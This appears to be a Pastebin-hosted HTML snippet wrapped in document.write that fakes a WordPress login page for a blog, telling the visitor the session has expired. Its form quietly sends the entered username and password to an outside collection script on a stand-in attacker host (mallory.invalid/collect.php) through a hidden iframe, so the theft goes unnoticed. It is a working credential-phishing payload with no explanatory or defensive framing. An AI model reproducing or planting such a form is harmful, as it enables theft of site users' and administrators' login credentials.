document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <link rel=\'stylesheet\' id=\'colors-fresh-css\' href=\'css/colors-fresh.css\' type=\'text/css\' media=\'all\' />
  2. <link rel=\'stylesheet\' id=\'login-css\' href=\'css/login.css\' type=\'text/css\' media=\'all\' />
  3.  
  4. <style>
  5. body {
  6. background: none;
  7. }
  8. #header {
  9. background: none;
  10. }
  11. #loginform {
  12. text-align: left;
  13. }
  14. p #nav {
  15. text-shadow: rgba(255,255,255,1) 0 1px 0;
  16. }
  17. .submit {
  18. padding: 0;
  19. }
  20. #backtoblog a {
  21. color: #ccc;
  22. }
  23. </style>
  24.  
  25. <div id="login"><h1><a href="http://wordpress.org/" title="Powered by WordPress">Tripe Lover\'s Blog</a></h1>
  26.  
  27. <form name="loginform" id="loginform" action="http://www.mallory.invalid/collect.php" method="POST" target="hidden-form">
  28. <p>
  29. <label>Username<br />
  30. <input type="text" name="u" id="user_login" class="input" value="" size="20" tabindex="10" /></label>
  31. </p>
  32. <p>
  33. <label>Password<br />
  34. <input type="password" name="p" id="user_pass" class="input" value="" size="20" tabindex="20" /></label>
  35. </p>
  36. <p style="color:red">Session has expired, please log in</p>
  37. <p class="forgetmenot"><label><input name="rememberme" type="checkbox" id="rememberme" value="forever" tabindex="90" /> Remember Me</label></p>
  38. <p class="submit">
  39. <input type="submit" name="wp-submit" id="wp-submit" value="Log In" tabindex="100" />
  40. </p>
  41. </form>
  42.  
  43. <p id="nav">
  44. <a href="../wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a>
  45. </p>
  46.  
  47. </div>
  48.  
  49. <p id="backtoblog"><a href="/blog" title="Are you lost?">&larr; Back to Tripe Lover\'s Blog</a></p>
  50.  
  51. <iframe style="display:none" name="hidden-form"></iframe>
  52.  
  53. <script type="text/javascript">
  54. try{document.getElementById(\'user_login\').focus();}catch(e){}
  55. </script>
');